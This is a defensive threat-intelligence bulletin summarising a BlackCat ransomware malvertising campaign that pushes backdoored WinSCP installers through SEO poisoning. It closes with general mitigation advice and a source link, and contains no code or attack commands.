Cyber Security Threat Summary:
“The BlackCat ransomware-as-a-service group is developing a threat activity cluster by deploying malicious malware using chosen keywords on webpages of legitimate organizations. They engage in unauthorized activities within company networks using cloned webpages of legitimate applications like WinSCP and SpyBoy. These cybercriminals hijack keywords to display malicious ads and lure unsuspecting users into downloading malware, a technique known as malvertising.

The attackers aim to steal top-level administrator privileges and establish persistence and backdoor access to the customer environment using remote management tools. The tactics employed in this campaign are similar to those used in previous campaigns by BlackCat, including the use of anti-antivirus or anti-endpoint detection and response tools like SpyBoy to evade detection.

To exfiltrate data, the attackers utilize the PuTTY Secure Copy client for transferring information. Further investigation of the command-and-control domains used by the threat actor reveals a possible relation with Clop ransomware.

The attack chain involves tricking unsuspecting users into downloading a cloned application containing malware through SEO-poisoning techniques. The initial loader is delivered, followed by the fetching of the bot core, and ultimately dropping the payload, typically a backdoor. In this specific case, the WinSCP application contained a backdoor with Cobalt Strike Beacon, which enables remote server operations.” (BankInfoSecurity, 2023).

Security Officer Comments:
This attack chain involves tricking unsuspecting users into downloading a cloned application containing malware through SEO-poisoning techniques. The initial loader is delivered, followed by the fetching of the bot core, and ultimately dropping the payload, typically a backdoor. In this specific case, the WinSCP application contained a backdoor with Cobalt Strike Beacon, which enables remote server operations.

The researchers also identified other tools employed by the threat actors. AdFind, for example, is used to retrieve and display information from Active Directory environments. In the hands of a threat actor, AdFind can be misused for tasks such as enumeration of user accounts, privilege escalation, and password hash extraction. The malicious actors also utilized the AnyDesk remote management tool to maintain persistence in the compromised environment.

Suggested Correction(s):
Mitigating SEO poisoning involves implementing several strategies to reduce the risk and impact of these attacks. This includes maintaining a strong security posture through regular software updates and patches, implementing strong authentication and access controls, monitoring and removing suspicious content, utilizing web application firewalls, regularly backing up website data, providing security awareness and training, notifying search engines about malicious content, conducting vulnerability assessments and penetration testing, monitoring for security threats, and staying informed about the latest SEO poisoning trends and countermeasures. By following these measures, organizations can enhance their defenses against SEO poisoning attacks and protect their websites and users from the associated risks.

Link(s):
https://www.bankinfosecurity.com/blackcat-uses-malvertising-to-push-backdoor-a-22433